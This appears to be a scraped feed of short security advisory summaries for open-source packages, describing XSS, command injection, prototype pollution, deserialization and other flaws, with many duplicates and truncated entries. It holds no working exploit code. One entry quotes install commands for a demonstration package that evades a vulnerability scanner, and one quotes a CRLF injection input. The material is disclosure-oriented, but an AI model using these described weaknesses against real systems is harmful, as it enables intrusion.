In Rundeck, authenticated users can craft a request that reveals Execution data and logs and Job details that they are not authorized to see. Depending on the configuration and the way that Rundeck is used, this could result in anything between a high severity risk, or a very low risk. If access is tightly restricted and all users on the system have access to all projects, this is not really …

Subrion CMS allows CSV injection via a phrase value within a language.

Faye is vulnerable to an authentication bypass in the extension system. The vulnerability allows any client to bypass checks put in place by server-side extensions, by appending extra segments to the message channel.

Faye is vulnerable to an authentication bypass in the extension system. The vulnerability allows any client to bypass checks put in place by server-side extensions, by appending extra segments to the message channel.

admin/blocks.php in Subrion CMS through allows PHP Object Injection (with resultant file deletion) via serialized data in the subpages value within a block to blocks/edit.`

In jQuery, passing HTML from untrusted sources, even after sanitizing it, to one of jQuery's DOM manipulation methods (i.e., .html(), .append(), and others) may execute untrusted code.

In jQuery, passing HTML from untrusted sources, even after sanitizing it, to one of jQuery's DOM manipulation methods (i.e. .html(), .append(), and others) may execute untrusted code.

In jQuery, passing HTML containing <option> elements from untrusted sources, even after sanitizing it, to one of jQuery's DOM manipulation methods (i.e., .html(), .append(), and others) may execute untrusted code.

In jQuery, passing HTML from untrusted sources, even after sanitizing it, to one of jQuery's DOM manipulation methods (i.e., .html(), .append(), and others) may execute untrusted code.

In jQuery, passing HTML containing <option> elements from untrusted sources, even after sanitizing it, to one of jQuery's DOM manipulation methods (i.e., .html(), .append(), and others) may execute untrusted code.

In jQuery, passing HTML containing <option> elements from untrusted sources, even after sanitizing it, to one of jQuery's DOM manipulation methods (i.e., .html(), .append(), and others) may execute untrusted code.

In jQuery passing HTML from untrusted sources, even after sanitizing it, to one of jQuery's DOM manipulation methods (i.e., .html(), .append(), and others) may execute untrusted code.

In jQuery, passing HTML containing <option> elements from untrusted sources, even after sanitizing it, to one of jQuery's DOM manipulation methods (i.e., .html(), .append(), and others) may execute untrusted code.

In Rundeck before version 3.2.6, authenticated users can craft a request that reveals Execution data and logs and Job details that they are not authorized to see. Depending on the configuration and the way that Rundeck is used, this could result in anything between a high severity risk, or a very low risk. If access is tightly restricted and all users on the system have access to all projects, this …

fun-map is vulnerable to Prototype Pollution. The function assocInM could be tricked into adding or modifying properties of 'Object.prototype' using a proto payload.

If the NiFi Registry uses an authentication mechanism other than PKI, the NiFi Registry would invalidate the authentication token on the client side but not on the server side during user logout. This permits the user's client-side token to be used after logging out to make API requests to NiFi Registry potentially hours after the user clicked logout.

A file inclusion vulnerability was found in the AJP connector enabled with a default AJP configuration port of in Undertow. A remote, unauthenticated attacker could exploit this vulnerability to read web application files from a vulnerable server. In instances where the vulnerable server allows file uploads, an attacker could upload malicious JavaServer Pages (JSP) code within a variety of file types and trigger this vulnerability to gain remote code execution.

The JSON gem has an Unsafe Object Creation Vulnerability. Specifically, use of JSON parsing methods can lead to creation of a malicious object within the interpreter, with adverse effects that are application-dependent.

This advisory has been marked as a false positive.

This advisory has been marked as a false positive.

pixl-class allows execution of arbitrary commands. The members argument of the create function can be controlled by users without any sanitization.

A carefully crafted or corrupt file may trigger a System.exit in Tika's OneNote Parser. Crafted or corrupted files can also cause out of memory errors and/or infinite loops.

node-rules including allows injection of arbitrary commands. The argument rules of function fromJSON() can be controlled by users without any sanitization.

An issue was discovered in libgit2, which is used by pygit2 package: checkout.c mishandles equivalent filenames that exist because of NTFS short names.

An issue was discovered in libgit2. path.c mishandles equivalent filenames that exist because of NTFS Alternate Data Streams.

An issue was discovered in libgit2 checkout.c mishandles equivalent filenames that exist because of NTFS short names. This may allow remote code execution when cloning a repository.

An issue was discovered in libgit2, which is used by pygit2 package: path.c mishandles equivalent filenames that exist because of NTFS Alternate Data Streams. This may allow remote code execution when cloning a repository.

An issue was discovered in libgit2, which is used by rugged gem: path.c mishandles equivalent filenames that exist because of NTFS Alternate Data Streams. This may allow remote code execution when cloning a repository.

An issue was discovered in libgit2, which is used by rugged gem: checkout.c mishandles equivalent filenames that exist because of NTFS short names. This may allow remote code execution when cloning a repository.

When starting IoTDB, the JMX port is exposed with no certification. Then, clients could execute code remotely.

Improper validation of certificate with host mismatch in Apache Log4j SMTP appender. This could allow an SMTPS connection to be intercepted by a man-in-the-middle attack which could leak any log messages sent through that appender.

Improper validation of certificate with host mismatch in Apache Log4j SMTP appender. This could allow an SMTPS connection to be intercepted by a man-in-the-middle attack which could leak any log messages sent through that appender.

Improper validation of certificate with host mismatch in Apache Log4j SMTP appender. This could allow an SMTPS connection to be intercepted by a man-in-the-middle attack which could leak any log messages sent through that appender.

OpenDMARC, when used with pypolicyd-spf, allows attacks that bypass SPF and DMARC authentication in situations where the HELO field is inconsistent with the MAIL FROM field.

decompress for Node.js is vulnerable to Arbitrary File Write via ../ in an archive member, when a symlink is used, because of Directory Traversal.

Croogo allows XSS via the title to admin/menus/menus or admin/taxonomy/vocabularies.

FasterXML jackson-databind 2.x before 2.9.10.4 mishandles the interaction between serialization gadgets and typing, related to org.apache.aries.transaction.jms.internal.XaPooledConnectionFactory (aka aries.transaction.jms).

FasterXML jackson-databind 2.x before 2.9.10.4 mishandles the interaction between serialization gadgets and typing, related to org.apache.commons.jelly.impl.Embedded (aka commons-jelly).

FasterXML jackson-databind 2.x before 2.9.10.4 mishandles the interaction between serialization gadgets and typing, related to javax.swing.JEditorPane.

MinIO has an authentication bypass issue in the MinIO admin API. Given an admin access key, it is possible to perform admin API operations, i.e., creating new service accounts for existing access keys without knowing the admin secret key.

Anch allows admins to cause XSS via crafted post content.

The PayPal function in paypal-adaptive could be tricked into adding or modifying properties of Object.prototype using a proto payload.

python-markdown2 through 2.3.8 allows XSS because element names are mishandled unless a \w+ match succeeds. For example, an attack might use elementname@ or elementname- with an onclick attribute.

This vulnerability allows remote attackers to create a denial-of-service condition on affected installations of OPC Foundation UA .NET Standard Authentication is not required to exploit this vulnerability. The specific flaw exists within the handling of sessions. The issue results from the lack of proper locking when performing operations on an object. An attacker can leverage this vulnerability to create a denial-of-service condition against the application.

In Shopizer before version 2.11.0, using API or Controller based versions negative quantity is not adequately validated hence creating incorrect shopping cart and order total. This vulnerability makes it possible to create a negative total in the shopping cart. This has been patched in version 2.11.0.

lazysizes allows execution of malicious JavaScript. The following attributes are not sanitized by the video-embed plugin: data-vimeo, data-vimeoparams, data-youtube and data-ytparams

jQuery allows XSS via a crafted onerror attribute of an IMG element.

re2c has a heap-based buffer overflow in Scanner::fill in parse/scanner.cc via a long lexeme.

Server or client applications that call the SSL_check_chain() function during or after a TLS handshake may crash due to a NULL pointer dereference as a result of incorrect handling of the signature_algorithms_cert TLS extension.

Server or client applications that call the SSL_check_chain() function during or after a TLS handshake may crash due to a NULL pointer dereference as a result of incorrect handling of the signature_algorithms_cert TLS extension.

Server or client applications that call the SSL_check_chain() function during or after a TLS handshake may crash due to a NULL pointer dereference as a result of incorrect handling of the signature_algorithms_cert TLS extension.

SimpleSAMLphp contain an information disclosure vulnerability. The module controller in SimpleSAML\Module that processes requests for pages hosted by modules, has code to identify paths ending with .php and process those as PHP code. If no other suitable way of handling the given path exists, it presents the file to the browser. The check to identify paths ending with .php does not account for uppercase letters. If someone requests a path …

A flaw was found in undertow, where the Servlet container causes servletPath to normalize incorrectly by truncating the path after semicolon which may lead to an application mapping resulting in the security bypass.

In Saml2 Authentication Services for ASP.NET, and between, there is a vulnerability in how tokens are validated in some cases. Saml2 tokens are usually used as bearer tokens - a caller that presents a token is assumed to be the subject of the token. There is also support in the Saml2 protocol for issuing tokens that is tied to a subject through other means, e.g. holder-of-key where possession of a …

Various forms of SQL injection has been found, for MySQL and when filtering or doing mass-updates on char/text fields. SQLite & PostgreSQL was only affected when filtering with contains, starts_with or ends_with filters (and their case-insensitive counterparts)

svg2png allows XSS with resultant SSRF via JavaScript inside an SVG document.

lix allows man-in-the-middle attackers to execute arbitrary code by modifying the HTTP client-server data stream so that the Location header is associated with attacker-controlled executable content in the postDownload field.

Versions of https-proxy-agent prior to 2.2.3 are vulnerable to Machine-In-The-Middle. The package fails to enforce TLS on the socket if the proxy server responds the to the request with a HTTP status different than 200. This allows an attacker with access to the proxy server to intercept unencrypted communications, which may include sensitive information such as credentials. Recommendation Upgrade to version 3.0.0 or 2.2.3.

Jenkins Parasoft Findings Plugin does not configure its XML parser to prevent XML external entity (XXE) attacks.

In Shopizer, using API or Controller based versions negative quantity is not adequately validated hence creating incorrect shopping cart and order total. This vulnerability makes it possible to create a negative total in the shopping cart.

Jenkins Yaml Axis Plugin does not configure its YAML parser to prevent the instantiation of arbitrary types, resulting in a remote code execution vulnerability.

In Dolibarr, if USER_LOGIN_FAILED is active, there is a stored XSS vulnerability on the admin tools audit page. This may lead to stealing of the admin account.

In Dolibarr, forms are protected with a CSRF token against CSRF attacks. The problem is any CSRF token in any user's session can be used in another user's session. CSRF tokens should not be valid in this situation.

Jenkins Copr Plugin stores credentials unencrypted in job config.xml files on the Jenkins master where they can be viewed by users with Extended Read permission, or access to the master file system.

A flaw was found in all versions of the Keycloak operator, before version 8.0.2,(community only) where the operator generates a random admin password when installing Keycloak, however the password remains the same when deployed to the same OpenShift namespace.

In SilverStripe, files uploaded via Forms to folders migrated from Silverstripe may be put to the default /Uploads folder instead.

Difficult to exploit vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Connectors. Successful attacks of this vulnerability can result in unauthorized ability to cause a partial denial of service (partial DoS) of MySQL Connectors.

Istio has a data-leak issue. If there is a TCP connection (negotiated with SNI over HTTPS) to *.example.com, a request for a domain concurrently configured explicitly (e.g., abc.example.com) is sent to the server(s) listening behind *.example.com. The outcome should instead be Misdirected Request. Imagine a shared caching forward proxy re-using an HTTP/2 connection for a large subnet with many users.

A remote code execution vulnerability exists in the way that the ChakraCore scripting engine handles objects in memory.

A remote code execution vulnerability exists in the way that the Chakra scripting engine handles objects in memory in Microsoft Edge (HTML-based).

It was found in all keycloak versions before 9.0.0 that links to external applications (Application Links) in the admin console are not validated properly and could allow Stored XSS attacks. An authed malicious user could create URLs to trick users in other realms, and possibly conduct further attacks.

It was found that keycloak before version 8.0.0 exposes internal adapter endpoints in org.keycloak.constants.AdapterConstants, which can be invoked via a specially-crafted URL. This vulnerability could allow an attacker to access unauthorized information.

Difficult to exploit vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise MySQL Connectors. Successful attacks require human interaction from a person other than the attacker and while the vulnerability is in MySQL Connectors, attacks may significantly impact additional products. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of MySQL Connectors accessible data as well as unauthorized read access …

Difficult to exploit vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise MySQL Connectors. Successful attacks require human interaction from a person other than the attacker. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of MySQL Connectors accessible data as well as unauthorized read access to a subset of MySQL Connectors accessible data and unauthorized ability to cause a …

The WindowsHello has a vulnerability where encrypted data could potentially be decrypted without needing authentication. If the library is used to encrypt text and write the output to a txt file, another executable could be able to decrypt the text using the static method NCryptDecrypt from this same library without the need to use Windows Hello Authentication again.

A cross-site scripting (XSS) vulnerability exists on the page revision comparison view within the Wagtail admin interface. A user with a limited-permission editor account for the Wagtail admin could potentially craft a page revision history that, when viewed by a user with higher privileges, could perform actions with that user's credentials. The vulnerability is not exploitable by an ordinary site visitor without access to the Wagtail admin.

An issue was discovered in OpenEXR. There is an out-of-bounds read and write in DwaCompressor::uncompress in ImfDwaCompressor.cpp when handling the UNKNOWN compression case.

There is a std::vector out-of-bounds read and write, as demonstrated by ImfTileOffsets.cpp.

There is an out-of-bounds write in copyIntoFrameBuffer in ImfMisc.cpp.

There is an out-of-bounds read in ImfOptimizedPixelReading.h.

There is an out-of-bounds read during RLE uncompression in rleUncompress in ImfRle.cpp.

There is an out-of-bounds read during Huffman uncompression, as demonstrated by FastHufDecoder::refill in ImfFastHuf.cpp.

There is an off-by-one error in use of the ImfXdr.h read function by DwaCompressor::Classifier::Classifier, leading to an out-of-bounds read.

Sonatype Nexus Repository before 3.21.2 allows JavaEL Injection (issue 1 of 2).

Because of integer overflows in CompositeDeepScanLine::Data::handleDeepFrameBuffer and readSampleCountForLineBlock, an attacker can write to an out-of-bounds pointer.

devcert-sanscache allows remote attackers to execute arbitrary code or cause a Command Injection via the exec function. The variable commonName controlled by user input is used as part of the exec function without any sanitization.

Sonatype Nexus Repository before 3.21.2 allows XSS.

Sonatype Nexus Repository before 3.21.2 allows Remote Code Execution.

Oasis has a potential DNS rebinding or CSRF vulnerability. If you're running a vulnerable application on your computer and an attacker can trick you into visiting a malicious website, they could use DNS rebinding and CSRF attacks.

wolfSSL has mulmod code in wc_ecc_mulmod_ex in ecc.c that does not properly resist timing side-channel attacks.

cpp-httplib does not filter \r\n in parameters passed into the set_redirect and set_header functions, which creates possibilities for CRLF injection and HTTP response splitting in some specific contexts.

dropwizard-validation before versions 2.0.3 and 1.3.21 has a remote code execution vulnerability. A server-side template injection was identified in the self-validating feature enabling attackers to inject arbitrary Java EL expressions, leading to Remote Code Execution (RCE) vulnerability. If you are using a self-validating bean an upgrade to Dropwizard 1.3.21/2.0.3 or later is strongly recommended. The changes introduced in Dropwizard 1.3.19 and 2.0.2 for CVE-2020-5245 unfortunately did not fix the underlying …

In the case of an (authentication) error, the error object returned by the library contains the original request of the user, which may include the plaintext password the user entered. If the error object is exposed or logged without modification, the application risks password exposure.

The ZlibDecoders in Netty allow for unbounded memory allocation while decoding a ZlibEncoded byte stream. An attacker could send a large ZlibEncoded byte stream to the Netty server, forcing the server to allocate all of its free memory to a single decoder.

npm-programmatic is vulnerable to Command Injection. The packages and option properties are concatenated together without any validation and are used by the exec function directly.

fsa is vulnerable to Command Injection. The first argument of execGitCommand(), located within lib/rep.js can be controlled by users without any sanitization to inject arbitrary commands.

clamscan is vulnerable to Command Injection. It is possible to inject arbitrary commands as part of the _is_clamav_binary function located within Index.js.

Jenkins Code Coverage API Plugin does not configure its XML parser to prevent XML external entity (XXE) attacks.

This advisory has been marked as a false positive.

The ZlibDecoders in Netty contains an unbounded memory allocation while decoding a ZlibEncoded byte stream. An attacker could send a large ZlibEncoded byte stream to the Netty server, forcing the server to allocate all of its free memory to a single decoder.

sds is vulnerable to Prototype Pollution. The library could be tricked into adding or modifying properties of the Object.prototype by abusing the set function located in js/set.js.

express-mock-middleware is vulnerable to Prototype Pollution. Exported functions by the package can be tricked into adding or modifying properties of the Object.prototype. Exploitation of this vulnerability requires creation of a new directory where an attack code can be placed which will then be exported by express-mock-middleware.

Jenkins AWSEB Deployment Plugin does not escape various values printed as part of form validation output, resulting in a reflected cross-site scripting vulnerability.

Jenkins FitNesse Plugin does not correctly escape report contents before showing them on the Jenkins UI, resulting in a stored cross-site scripting (XSS) vulnerability exploitable by users who are able to control the XML input files processed by the plugin.

Jenkins Gatling Plugin prevents Content-Security-Policy headers from being set for Gatling reports served by the plugin, resulting in an XSS vulnerability exploitable by users able to change report content.

Multiple form validation endpoints in Jenkins Mango Runner Plugin do not escape values received from the useMango service, resulting in a cross-site scripting (XSS) vulnerability exploitable by users who are able to control the values returned from the useMango service.

There is an information disclosure issue in DNN (formerly DotNetNuke) within the built-in Activity-Feed/Messaging/Userid/ Message Center module. A registered user is able to enumerate any file in the Admin File Manager (other than ones contained in a secure folder) by sending themselves a message with the file attached, e.g., by using an arbitrary small integer value in the fileIds parameter.

apiconnect-cli-plugins is vulnerable to Command Injection. It allows execution of arbitrary commands via the pluginUri argument.

compass-compile is vulnerable to Command Injection. It allows execution of arbitrary commands via the options argument.

diskusage-ng is vulnerable to Command Injection. It allows execution of arbitrary commands via the path argument.

adb-driver is vulnerable to Command Injection. It allows execution of arbitrary commands via the command function.

heroku-addonpool is vulnerable to Command Injection.

node-mpv is vulnerable to Command Injection. It allows execution of arbitrary commands via the options argument.

Jooby is vulnerable to HTTP Response Splitting if DefaultHttpHeaders is set to false.

All versions of Jooby are vulnerable to HTTP Response Splitting. if DefaultHttpHeaders is set to false.

A vulnerability was found in all versions of Keycloak where the pages on the Admin Console area of the application are completely missing general HTTP security headers in HTTP-responses. This does not directly lead to a security issue, yet it might aid attackers in their efforts to exploit other problems. The flaws unnecessarily make the servers more prone to Clickjacking, channel downgrade attacks and other similar client-based attack vectors.

A vulnerability was found in Keycloak where the pages on the Admin Console area of the application are completely missing general HTTP security headers in HTTP-responses. This does not directly lead to a security issue, yet it might aid attackers in their efforts to exploit other problems. The flaws unnecessarily make the servers more prone to Clickjacking, channel downgrade attacks and other similar client-based attack vectors.

An attacker could alter the configuration concerning Pollers in Apache Centreon so that it is possible to run arbitrary code with root privileges.

confinit is vulnerable to Prototype Pollution. The setDeepProperty function could be tricked into adding or modifying properties of Object.prototype using a proto payload.

class-transformer is vulnerable to Prototype Pollution. The classToPlainFromExist function could be tricked into adding or modifying properties of Object.prototype using a proto payload.

dot is vulnerable to Prototype Pollution. The function set could be tricked into adding or modifying properties of Object.prototype using a proto payload.

Affected versions of acorn is vulnerable to Regular Expression Denial of Service. A regex in the form of /[x-\ud800]/u causes the parser to enter an infinite loop. The string is not valid UTF16 which usually results in it being sanitized before reaching the parser. If an application processes untrusted input and passes it directly to acorn, attackers may leverage the vulnerability leading to Denial of Service.

This affects the package io.jooby:jooby-netty before 1.6.9, from 2.0.0 and before 2.2.1. The DefaultHttpHeaders is set to false which means it does not validates that the header isn't being abused for HTTP Response Splitting.

An input validation flaw in npm package utils-extend may allow prototype pollution attacks resulting in remote code execution or denial of service.

op-browser is vulnerable to Command Injection. It allows execution of arbitrary commands via the url function.

install-package is vulnerable to Command Injection. It allows execution of arbitrary commands via the options argument.

node-key-sender is vulnerable to Command Injection. It allows execution of arbitrary commands via the arrParams argument in the execute() function.

git-add-remote is vulnerable to Command Injection. It allows execution of arbitrary commands via the name argument.

jscover is vulnerable to Command Injection. It allows execution of arbitrary command via the source argument.

umount is vulnerable to Command Injection. The argument device can be controlled by users without any sanitization.

get-git-data is vulnerable to Command Injection. It is possible to inject arbitrary commands as part of the arguments provided to get-git-data.

karma-mojo is vulnerable to Command Injection. It allows execution of arbitrary commands via the config argument.

pomelo-monitor is vulnerable to Command Injection. It allows injection of arbitrary commands.

install-package is vulnerable to Command Injection. It allows execution of arbitrary commands via the device function.

effect is vulnerable to Command Injection. It allows execution of arbitrary command via the options argument.

ini-parser is vulnerable to Prototype Pollution. The library could be tricked into adding or modifying properties of Object.prototype using a proto payload.

There is a DoS vulnerability in Pillow before 6.2.2 caused by FpxImagePlugin.py calling the range function on an unvalidated 32-bit integer if the number of bands is large. On Windows running 32-bit Python, this results in an OverflowError or MemoryError due to the 2 GB limit. However, on Linux running 64-bit Python this results in the process being terminated by the OOM killer.

libImaging/FliDecode.c in Pillow before 6.2.2 has an FLI buffer overflow.

Versions of ecstatic prior to 4.1.2, 3.3.2 or 2.2.2 are vulnerable to Open Redirect. The package fails to validate redirects, allowing attackers to craft requests that result in an HTTP 301 redirect to any other domains. Recommendation If using ecstatic 4.x, upgrade to 4.1.2 or later. If using ecstatic 3.x, upgrade to 3.3.2 or later. If using ecstatic 2.x, upgrade to 2.2.2 or later.

When LDAP authentication is enabled in Apache Druid, callers of Druid APIs with a valid set of LDAP credentials can bypass the credentialsValidator.userSearch filter barrier that determines if a valid LDAP user is allowed to authenticate with Druid.

Apache CXF has the ability to integrate with JMX by registering an InstrumentationManager extension with the CXF bus. If the ‘createMBServerConnectorFactory‘ property of the default InstrumentationManagerImpl is not disabled, then it is vulnerable to a man-in-the-middle (MITM) style attack. An attacker on the same host can connect to the registry and rebind the entry to another server, thus acting as a proxy to the original. They are then able to …

Apache CXF has the ability to integrate with JMX by registering an InstrumentationManager extension with the CXF bus. If the createMBServerConnectorFactory property of the default InstrumentationManagerImpl is not disabled, then it is vulnerable to a man-in-the-middle (MITM) style attack.

mocha is vulnerable to ReDos

A flaw was found in all python-ecdsa versions before 0.13.3, where it did not correctly verify whether signatures used DER encoding. Without this verification, a malformed signature could be accepted, making the signature malleable. Without proper verification, an attacker could use a malleable signature to create false transactions.

There is a vulnerability in knockout, where after escaping the context of the web application, the web application delivers data to its users along with other trusted dynamic content, without validating it.

The fileview package v0.1.6 has inadequate output encoding and escaping, which leads to a stored Cross-Site Scripting (XSS) vulnerability in files it serves.

The seefl package v0.1.1 is vulnerable to a stored Cross-Site Scripting (XSS) vulnerability via a malicious filename rendered in a directory listing.

The OpenID Connect reference implementation for MITREid Connect through 1.3.3 allows XSS due to userInfoJson being included in the page unsanitized. This is related to header.tag. The issue can be exploited to execute arbitrary JavaScript.

Unsafe deserialization occurs within a Dubbo application which has HTTP remoting enabled. An attacker may submit a POST request with a Java object in it to completely compromise a Provider instance of Apache Dubbo.

Scripts in Sling CMS do not property escape the Sling Selector from URLs when generating navigational elements for the administrative consoles and are vulnerable to reflected XSS attacks.

phpMyAdmin allows CRLF injection, as demonstrated by %0D%0Astring%0D%0A inputs to login form fields causing CRLF sequences to be reflected on an error page.

In Twisted Web before 20.3.0, there was an HTTP request splitting vulnerability. When presented with two content-length headers, it ignored the first header. When the second content-length value was set to zero, the request body was interpreted as a pipelined request.

A vulnerability was found in Moodle: OAuth 2 providers who do not verify users' email address changes require additional verification during sign-up to reduce the risk of account compromise.

In Twisted Web through 20.3.0, there was an HTTP request splitting vulnerability. When presented with a content-length and a chunked encoding header, the content-length took precedence and the remainder of the request body was interpreted as a pipelined request.

FasterXML jackson-databind mishandles the interaction between serialization gadgets and typing, related to org.apache.activemq.*.

FasterXML jackson-databind mishandles the interaction between serialization gadgets and typing, related to org.apache.commons.proxy.provider.remoting.RmiProvider.

Incorrect parsing of certain JSON input may result in js-bson not correctly serializing BSON. This may cause unexpected application behaviour including data disclosure.

odata4j suffers from a SQL injection vulnerability in ExecuteCountQueryCommand.java.

odata4j suffers from a SQL injection flaw in ExecuteJPQLQueryCommand.java.

An issue was discovered in USC iLab cereal. It employs caching of std::shared_ptr values, using the raw pointer address as a unique identifier. This becomes problematic if a std::shared_ptr variable goes out of scope and is freed, and a new std::shared_ptr is allocated at the same address. Serialization fidelity thereby becomes dependent upon memory layout. In short, serialized std::shared_ptr variables cannot always be expected to serialize back into their original …

Impact bleach.clean behavior parsing style attributes could result in a regular expression denial of service . Calls to bleach.clean with an allowed tag with an allowed style attribute are vulnerable to ReDoS. For example, ``bleach.clean(…, attributes={'a': 'style' Workarounds do not allowlist the style attribute in bleach.clean calls limit input string length References https://bugzilla.mozilla.org/show_bug.cgi?id=1623633 https://www.regular-expressions.info/redos.html https://blog.r2c.dev/posts/finding-python-redos-bugs-at-scale-using-dlint-and-r2c/ https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6817 Credits Reported by schwag09 of r2c For more information If you have any questions …

In Symfony, some properties of the Exception were not properly escaped when the ErrorHandler rendered it stacktrace. In addition, the stacktrace was displayed in a non-debug configuration. The ErrorHandler now escapes alls properties of the exception, and the stacktrace is only displayed in debug configurations.

In symfony/security-http before versions 4.4.7 and 5.0.7, when a Firewall checks access control rule, it iterate overs each rule's attributes and stops as soon as the accessDecisionManager decides to grant access on the attribute, preventing the check of next attributes that should have been take into account in an unanimous strategy. The accessDecisionManager is now called with all attributes at once, allowing the unanimous strategy being applied on each attribute. …

In symfony/security-http, when a Firewall checks access control rule, it iterates overs each rule's attributes and stops as soon as the accessDecisionManager decides to grant access on the attribute, preventing the check of next attributes that should have been take into account in a unanimous strategy. The accessDecisionManager is now called with all attributes at once, allowing the unanimous strategy being applied on each attribute.

The Micronaut HTTP client is vulnerable to HTTP Request Header Injection due to not validating request headers passed to the client.

The Gradle publish plugin is vulnerable to Insertion of Sensitive Information into Log File. When a plugin author publishes a Gradle plugin while running Gradle with the –info log level flag, the Gradle Logger logs an AWS pre-signed URL.

An issue was discovered in USC iLab cereal. Serialization of an (initialized) C/C++ long double variable into a BinaryArchive or PortableBinaryArchive leaks several bytes of stack or heap memory, from which sensitive information (such as memory layout or private keys) can be gleaned if the archive is distributed outside a trusted context.

NetBeans autoupdate does not fully validate code signatures. An attacker could modify the downloaded nbm and include additional code.

In Symfony, when a Response does not contain a Content-Type header, affected versions of Symfony can fallback to the format defined in the Accept header of the request, leading to a possible mismatch between the response content and Content-Type header. When the response is cached, this can prevent the use of the website by other users.

The NetBeans autoupdate system does not validate SSL certificates and hostnames for https based downloads. This allows an attacker to intercept downloads of autoupdates and modify the download, potentially injecting malicious code.

In Symfony before versions 5.0.5 and 4.4.5, some properties of the Exception were not properly escaped when the ErrorHandler rendered it stacktrace. In addition, the stacktrace were displayed even in a non-debug configuration. The ErrorHandler now escape alls properties of the exception, and the stacktrace is only display in debug configuration. This issue is patched in symfony/http-foundation versions 4.4.5 and 5.0.5

In Elide it is possible for an adversary to "guess and check" the value of a model field they do not have access to assuming they can read at least one other field in the model. The adversary can construct filter expressions for an inaccessible field to filter a collection.

Not affected: Deployments on ZEIT Now v2 (https://zeit.co) are not affected Not affected: Deployments using the serverless target Not affected: Deployments using next export Affected: Users of Next.js below 9.3.2 We recommend everyone to upgrade regardless of whether you can reproduce the issue or not.

All versions of bson are vulnerable to Deserialization of Untrusted Data. The package will ignore an unknown value for an object's _bsotype, leading to cases where an object is serialized as a document rather than the intended BSON type.

bson is vulnerable to Deserialization of Untrusted Data. The package will ignore an unknown value for an object's _bsotype, leading to cases where an object is serialized as a document rather than the intended BSON type.

Azkaban suffers from XXE injection due to invalid handling of XML in validator/XmlValidatorManager.java and user/XmlUserManager.java.

The Kubernetes API server component has been found to be vulnerable to a denial of service attack via successful API requests.

The Kubernetes API server component has been found to be vulnerable to a denial of service attack via successful API requests.

The Kubelet component has been found to be vulnerable to a denial of service attack via the kubelet API, including the unauthenticated HTTP read-only API typically served on port, and the authenticated HTTPS API typically served on port

The Kubelet component has been found to be vulnerable to a denial of service attack via the kubelet API, including the unauthenticated HTTP read-only API typically served on port, and the authenticated HTTPS API typically served on port

A URL parsing issue in goog.uri of the Google Closure Library allows an attacker to send malicious URLs to be parsed by the library and return the wrong authority.

VVE-2020-0001 Earlier today, we received a responsible disclosure of a potential issue from @montyly (security researcher at @trailofbits) for Vyper users who make assumptions about what values certain interface types can return. Impact We determined the issue to be mild and unlikely to be exploited, with an easy workaround while the correct resolution is in process. The issue stems from a number of things, which we will detail here. (1) …

FrozenNode Laravel-Administrator allows unrestricted file upload (and consequently Remote Code Execution) via admin/tips_image/image/file_upload image upload with PHP content within a GIF image that has the .php extension.

http4s has a local file inclusion vulnerability due to URI normalization being applied incorrectly. This vulnerability applies to all users of org.http4s.server.staticcontent.FileService, org.http4s.server.staticcontent.ResourceService and org.http4s.server.staticcontent.WebjarService.

The Jenkins RapidDeploy Plugin does not configure it's XML parser to prevent XML external entity (XXE) attacks.

http4s before versions 0.18.26, 0.20.20, and 0.21.2 has a local file inclusion vulnerability. This vulnerability applies to all users of org.http4s.server.staticcontent.FileService, org.http4s.server.staticcontent.ResourceService and org.http4s.server.staticcontent.WebjarService. URI normalization is applied incorrectly. Requests whose path info contain ../ or // can expose resources outside of the configured location. This issue is patched in versions 0.18.26, 0.20.20, and 0.21.2. Note that 0.19.0 is a deprecated release and has never been supported.

Jenkins Azure Container Service Plugin does not configure its YAML parser to prevent the instantiation of arbitrary types, resulting in a remote code execution vulnerability.

Jenkins OpenShift Pipeline Plugin does not configure its YAML parser to prevent the instantiation of arbitrary types, resulting in a remote code execution vulnerability.

AWS Steps Plugin does not configure its YAML parser to prevent the instantiation of arbitrary types, resulting in a remote code execution vulnerability.

Apache Shiro, when using Apache Shiro with Spring dynamic controllers, a specially crafted request may cause an authentication bypass.

When using Apache Shiro with Spring dynamic controllers, a specially crafted request may cause an authentication bypass.

A form validation endpoint in Jenkins Queue cleanup Plugin does not properly escape a query parameter displayed in an error message, resulting in a reflected XSS vulnerability.

Jenkins does not properly escape node labels that are shown in the form validation for label expressions on job configuration pages, resulting in a stored XSS vulnerability exploitable by users able to define node labels.

Jenkins does not set Content-Security-Policy headers for files uploaded as file parameters to a build, resulting in a stored XSS vulnerability.

Jenkins improperly processes HTML content of list view column headers, resulting in a stored XSS vulnerability exploitable by users able to control column headers.

PrestaShop module ps_facetedsearch has a reflected XSS in the url_name parameter.

The Jenkins RapidDeploy Plugin does not escape package names in the table of packages obtained from a remote server, resulting in a stored XSS vulnerability.

Jenkins uses different representations of request URL paths, which allows attackers to craft URLs that allow bypassing CSRF protection of any target URL.

Saml2 Authentication services for ASP.NET (NuGet package Sustainsys.Saml2) has a faulty implementation of Token Replay Detection. Token Replay Detection is an important defence in depth measure for Single Sign On solutions.

Python Auditing Vulnerability Demonstrates how a malicious package can insert a load-time poison pill to avoid detection by tools like Safety. Tools that are designed to find vulnerable packages can not ever run in the same python environment that they are trying to protect. Usage Install safety, insecure-package, and this package with pip in the same python environment. Order doesn&#39;t matter. pip install safety pip install insecure-package pip install dist/malicious-0.1-py3-none-any.whl …

When configuring a Conditional OTP Authentication Flow as a post login flow of an IDP, the failure login events for OTP are not being sent to the brute force protection event queue. So BruteForceProtector does not handle these events.

A flaw was found in keycloak. When configuring a conditional OTP Authentication Flow as a post login flow of an IDP, the failure login events for OTP are not being sent to the brute force protection event queue. So BruteForceProtector does not handle these events.

Impact Anybody using this library to sign with a BIP44 account other than the first account may be affected. If a user is signing with the first account (i.e. the account at index 0), or with the legacy MEW/MyCrypto HD path, they are not affected. The vulnerability impacts cases where the user signs a personal message or transaction without first adding the account. This includes cases where the user has …

Impact Anybody using this library to sign with a BIP44 account other than the first account may be affected. If a user is signing with the first account (i.e. the account at index 0), or with the legacy MEW/MyCrypto HD path, they are not affected. The vulnerability impacts cases where the user signs a personal message or transaction without first adding the account. This includes cases where the user has …

PyYAML is susceptible to arbitrary code execution when it processes untrusted YAML files through the full_load method or with the FullLoader loader. Applications that use the library to process untrusted input may be vulnerable to this flaw. An attacker could use this flaw to execute arbitrary code on the system by abusing the python/object/new constructor.

